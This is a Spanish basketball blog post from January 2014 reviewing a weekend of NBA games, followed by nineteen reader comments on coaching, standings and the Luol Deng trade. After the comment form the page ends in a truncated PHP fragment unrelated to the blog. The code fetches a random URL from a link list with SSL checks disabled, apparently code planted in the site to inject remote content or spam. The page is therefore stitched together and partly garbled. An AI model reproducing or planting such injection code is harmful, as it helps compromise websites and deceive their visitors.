Informe de fin de semana: ¿Hemos sido buenos?

06 de January de 2014 por TheDeerHunter

Muchas cosas de las que hablar. A ello.

El viernes destacábamos tres partidos, pero todos terminaron siendo muy bonitos por unas razones u otras. Vosotros distéis buena cuenta de ellos.

“Tremendo Iguodala, un mal partido de los Warriors que al final dieron todo para recordar una diferencia de dos digitos y terminar con un super triple de Iggy. Demuestra una vez mas que es lo que necesitaban los Warriors para ganar partidos complicados.” Suffer.

En efecto, los Warriors superaron casi de milagro el duro examen que les puso Atlanta. Curiosamente el partido de Iguodala no fue lo más brillante que hemos visto suyo, como tampoco de su equipo. Tuvo el tino de acertar su único triple en el momento justo. Ni siquiera alcanzó los dobles dígitos. Curry rozó el cuádruple doble, pero con 9 pérdidas.

En el Clippers@Mavs muy meritoria victoria de los angelinos pero a un alto coste. Lesión de CP3 para alrededor de 6 semanas. Griffin y Jordan lograron marcar la diferencia a pesar de todo. Demasiado cómodos quizá, como comentábais.
Del tercer partido estrella a priori, el Raptors@Wizards, Esteban comentaba:

“Ujiri quería una alta selección del draft, y hoy están a dos juegos de ser terceros en la conferencia ESTE, y quienes los aventajan por dos juegos han perdido a Horford, asi que hay una posibilidad real de terminar en la tercera posición y soñar no solo con PO sino hasta con una segunda ronda. Ayer le gano con una autoridad a los Wizards, propia de un equipo que esta a otro nivel.”

El resto de la jornada no bajó el nivel. Es obligado comentar la inmensa actuación de Pau Gasol, MVP de la jornada en una situación personal extrema en el equipo. Victoria ante Utah con un inesperado aliado para Pau, Kendall Marshall.
También vimos un trepidante Knicks@Rockets, pero en él pudimos constatar el nivel de concentración de los pupilos de Woodson. Absolutamente demencial, y llueve sobre mojado.

“Van empate a 100 a falta de 25 segundos, Udrih se tira un triple, lo falla, cogen el rebote ofensivo y en vez de agotar la última posesión para no dar opción al rival y como mínimo asegurar la prorroga, llega JR Smith y a falta de 20 seg, se juega un triple y lo falla, hacen falta a los Rockets al coger el rebote, mandan a Brooks a los libres, mete los 2 y en la ultima jugada tienen 2 opciones para forzar la prorroga y fallan.” Denise.

Cerrando el viernes los Nuggets rompieron su terrible racha de derrotas ganando por los pelos a Grizzlies y los Pelicans se imponían a Boston.

El sábado perdió algo de interés porque los Clippers, mermados, apenas fueron rival de unos Spurs muy sólidos. El Thunder@Wolves, sin embargo, lo compensó todo.

“Que brutalidad de último cuarto de Durant y que incapacidad total que tienen los Wolves para ganar partidos apretados. Creo que decían que de 9 partidos que se han decidido por menos de 4 puntos los habían perdido todos.” Rumbero.

Efectivamente pudimos disfrutar de la magnificencia de Durantula en su máxima expresión. 48 puntazos y por poco se le escapa la victoria.

Poco se habló en el blog del resto de partidos del día, como consecuencia del run-run del Bynum-Gasol. Tampoco fue una maravilla de jornada. Heat y Pacers ganaron bien a Pelicans y Magic respectivamente. La campanada la dieron los Sixers en Portland y algo los Bulls ante Atlanta. Parece que los Nets empiezan a carburar y aprovecharon el río revuelto ante Cavaliers. Los Suns cumplieron el trámite ante Milwaukee y los Bobcats lograron una importante victoria en Sacramento.

Finalmente el domingo dos buenos sustos para Indiana y Miami frente a Cavs y Raptors respectivamente; los Thunder aplastaban a los Celtics y los Warriors no pasaban excesivos apuros en Washington para mantener inmaculada su gira; los Knicks lograban vencer en Dallas y los Nuggets se daban un festín ante Lakers, que están para muy pocas batallas.

Por último duelo muy decepcionante entre Grizzlies y Pistons por parte de los segundos:

“Palizon de los Grizzlies a los Pistons en un encuentro muy igualado hasta la mitad del tercer cuarto. A partir de ahí, a los Pistons no les entra una y los ositos lo aprovechan para machacarlos por dentro. La diferencia en el rebote abismal, 59-43 y es inconcebible que un equipo tan fisico como los de Michigan con Smith, Monroe y Drummond por dentro, sean tan blanditos.” Denise.

Comenta

19 comentarios a esta entrada

  1. r_miller dice:
    #1

    Yo no entiendo como los pistons y los wizards con los equipos que tienen, para mi mucho mejores que los hawks y los raptors esten tan abajo en la debil conferencia este luchando con los bobcats i equipos de un perfil real bajo. Realmente a Detroit no les he visto jugar mucho pero por los resultados supongo que realmente mal y a los wizards esta claro que les falta veterania mientras que Wall necessita que Beal y Gortat den un paso al frente y sobretodo Beal tiene urgencia de pasar de ser un potencial All-Star a un real All-Star para llegar tranquilamente a los play-offs y dar un buen papel contra un grande.

      Citar

  2. Esteban dice:
    #2

    no se comenta nada, pero terrible derrota de los lakers, a quienes los hundidos Nuggets le anotaron nada mes que 137 puntos, en que año de la nba se quedo D´antoni? eso hoy en dia es inaceptable

    como se decia el fin de semana, lo mejor que pueden hacer los lakers es traspasar a Gasol para cortar Bynum, no apurar el regreso de Nash y que Kobe no vuelva este año, eso los dejaria con suerte en 20 victorias y una seleccion top 5 del draft

    un jabari parker, wiggins, randle, Embiid, smart o Exum creo que valen la pena hacer un papelon en lo que queda de la temporada, por que de hecho hoy los lakers estan al borde del papelon, pagando impuesto de lujo y no asegurandose una seleccion top 5

      Citar

  3. Esteban dice:
    #3

    por otra parte, la conferencia del Este es un caso increible, los equiipos que se mueren por PO y se armaron para ello, son un lastre, contando a Nets, Knicks, Wizards y Cavs principalmente, y los que quieren irse bien al fondo pensando en el draft estan por encima de casi todos ellos, digamos Boston, Phidalefia y Raptors

      Citar

  4. Vader dice:
    #4

    A ver si los Knicks se animan después de esta gira por el Oeste donde se han ganado dos de los tres partidos. Tal y como esta el Este y si el equipo va recuperando lesionados y Shumpert sigue aportando tendríamos que subir como la espuma en la clasificación del Este.

    Y sobretodo a ver si JR se pone las pilas…

    Saludos

      Citar

  5. Esteban dice:
    #5

    Vader: obretodo a ver si JR se pone las pilas…

    viendo como esta el este, hoy ganas 3 partidos seguidos, y por mas que tengas un balance 14-20 te metes en PO

    creo que tanto los Knicks y los Nets terminaran clasificando, mas cuando algunos equipos como Philadelfia y Boston empiecen a perder juegos de forma descarada

    ahora si, puede ser un historico los percentajes de victorias de los ultimos clasificados en el este

      Citar

  6. Chipi dice:
    #6

    Esteban:
    en que año de la nba se quedo D´antoni?

    Hace un par de días leí unas declaraciones suyas en las que admitía no conocer nada del juego de Kendall Marshall, y que le ponía porque no había otro. Yo no entiendo mucho de entrenadores ni de scouting, pero ¿cuánto dinero pueden cobrar entre todos los tíos de traje que hay en el banquillo? Lo de este tío me parece una auténtica vergüenza.

      Citar

  7. Esteban dice:
    #7

    la verdad, una vergueza, peca de demasiado autentico, es preferible que diga que lo sigue desde la universidad y que le gustaba como jugaba a decir que no lo conoce,

    habla bien de d´antoni como persona por ser honesto, pero realmente habla mal de d´antoni entrenador

      Citar

  8. HisRoyalAirness dice:
    #8

    Hacemos un equipo entre nosotros y nos metemos en playoffs en el Este.
    Y ahora porque los Pacers ya están consolidados pero yo me sigo descojonando del paseo que han sido las temporadas de anillo de los Heat.
    No me cansaré de decir que, en una conferencia ya de por sí lamentable, se juntaron 3 jugadores franquicia en un equipo y ya se olvidó todo el mundo.
    Alguien se cree que Orlando o Cleveland hubiesen llegado, ya no a la final, sino a finales de conferencia en el Oeste? Es que no es mérito de un jugador o un equipo, es demérito del nivel bochornoso que hay en comparación.
    La NBA debería revisar seriamente las implicaciones que tiene que unos equipos se partan la crisma durante todo el año y luego en Playoffs para que los de enfrente se den un paseo militar, descansando continuamente a jugadores, se lleven la ventaja de campo con la chorra y lleguen a las finales descansadisimos, despues de haber jugado, como mucho, una serie un poco dura.

    Sé que vais a llamarme hater pero, que reto han tenido los Heat estos años? Creo que los Pacers ahora SI son un rival digno pero ni el año pasado tenían este nivel. Y por favor no me digais los Celtics , que se jubilaron en 2009.
    Rose lesionado, Rondo lesionado, sólo falta que se parta la rodilla Paul George.
    Sé que lo de las conferencias es cíclico y todo se va compensando y blablabla pero llevamos así 15 años.

    Ala, ya me he desahohado

      Citar

  9. Ruxixon dice:
    #9

    Chipi: Hace un par de días leí unas declaraciones suyas en las que admitía no conocer nada del juego de Kendall Marshall, y que le ponía porque no había otro. Yo no entiendo mucho de entrenadores ni de scouting, pero ¿cuánto dinero pueden cobrar entre todos los tíos de traje que hay en el banquillo? Lo de este tío me parece una auténtica vergüenza.

    Es que tiene bemoles que nosotros como aficionados desde este blog apuesto a que el 100% de los que comentamos más o menos con frecuencia conocemos un poquitín de K.Marshall.Que un tio que está dentro de todo el meollo diga eso es una absoluta vergüenza.

      Citar

  10. Esteban dice:
    #10

    desde antes del anterior draft se hablaba que Marshall es una excelente director de orquesta, una version parecida a ricky, aunque con menos velocidad y peor aun de cara al aro, pero siempre se dijo y se repitió que el tio podía llenarse de asistencias y de hecho, lo esta haciendo

    es raro también que los Suns no le hayan tenido nada de paciencia, mas que la temporada pasada estuvo lesionado, ya que están sobrando de bases, pero lo metieron como moneda de cambio para los Wizars quienes a su vez lo cortaron, y guste o no, jugo un fin de semana perfecto

      Citar

  11. Esteban dice:
    #11

    Menphis se hace finalmente con Lee, otro triplero para ayudar a liberar espacios en la zona pintada, aunque hasta que vuelva Gasol las cosas dudo que mejoren y hoy la vara esta puesta demasiado alta en el oeste para darse el lujo de caer tan debajo del 50%

    por otra parte, cuando vuelva gasol, y visto el rendimiento de Zach, Koufos, Leur y Davis, no es hora de ir buscando un traspaso por alguno de estos?

      Citar

  12. Jose Luis dice:
    #12

    Deng + picks a Cavs a cambio de Bynum

      Citar

  13. Vader dice:
    #13

    Ya tenemos aquí el primer traspaso importante. Luol Deng a los Cavs a cambio de Bynum, que será cortado de inmediato y tres primeras rondas. ¿Chicago empieza a reconstruir o sólo a tankear este año a la espera de ver como vuelve Derrick Rose?

    Por su parte a los Cavs les queda un equipo muy potente. Aunque sigo pensando que mientras el entrenador será Mike Brown lo tienen difícil… Por cierto, supongo que si fichan a Deng es porque tienen claro que LeBron no volverá este verano a Cleveland.

    Saludos.

      Citar

  14. Vader dice:
    #14

    Parece ser que las tres rondas son, una primera ronda protegida top-ten durante los dos siguientes años que viene de Sacramento Kings y dos segundas rondas de Portland.

    Viendo las rondas que han llegado a Chicago me parece un gran movimiento por parte de Cavs y no tan bueno por parte de Bulls.

    Saludos

      Citar

  15. Denise dice:
    #15

    Vader:
    Por cierto, supongo que si fichan a Deng es porque tienen claro que LeBron no volverá este verano a Cleveland.

    Saludos.

    No tiene por qué…¿y si a Deng no le da la gana renovar?

      Citar

  16. Ruxixon dice:
    #16

    A mí lo que me preocupa es cómo se va a tomar Thibo el traspaso de Deng y cómo puede repercutir en su relación con la franquicia.Desconozco cuántos años tiene firmados pero en mi imaginario ahora mismo no descarto para nada que además intenten algo con Melo usando a Boozer.

      Citar

  17. Vader dice:
    #17

    Denise: No tiene por qué…¿y si a Deng no le da la gana renovar?

    Bueno supongo que ellos ofrecerán el máximo de años y salarios a Deng para que se quede. Llegados a este punto no me imagino a LeBron fichando por los Cavs como segundo plato…

      Citar

  18. Esteban dice:
    #18

    gran movimiento de los Bulls, que estan penando desde hace un par de temporadas con el limite antes del impuesto de lujo

    una movida, que hoy, nos les repercutira mucho, Deng viene jugando poco ultimamente y las lesiones empezaban a aquejarlo seguido, ahorrarse ese contrato es un acierto

    por otra parte, va clavada la amnistía a Boozer, y la no renovación de los veteranos que vienen para ayudar al equipo a salir campeón y no va a ser posible

    Rose, Butler y Noah es un nucleo desde donde construir, sumando alguna pieza en este draft, algún agente libre y con lo malo que es el este, ya la próxima temporada podrían estar en PO con un plantel mas joven, barato y con mas futuro que el actual

    una pena, los Bulls hace 4 años eran un equipo aspirante legitimo al titulo, pero las lesiones de Rose los han dejado sin nada

      Citar

  19. Esteban dice:
    #19

    a quienes no termino de entender bien es a los Cavs y lo empecinados que estan con los PO de este año

    esta bien que es un año especial y la segunda ronda del este esta mas barata que nunca, pero creo que esta claro que su equipo no funciona, Irving y Waiters se llevan para el diablo, Bennett al menos este año va caminoi a ser el peor pick 1 que recuerdo, Varejao sigue entre lesion y lesion, Earl Clark es un 4 de nivel aceptable, pero no un 3 como tiene entendido Brown, y asi seguimos

    cuando mejores los podria hacer un Luol Deng, digo en el caso que este sano y pueda jugar muchos minutos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>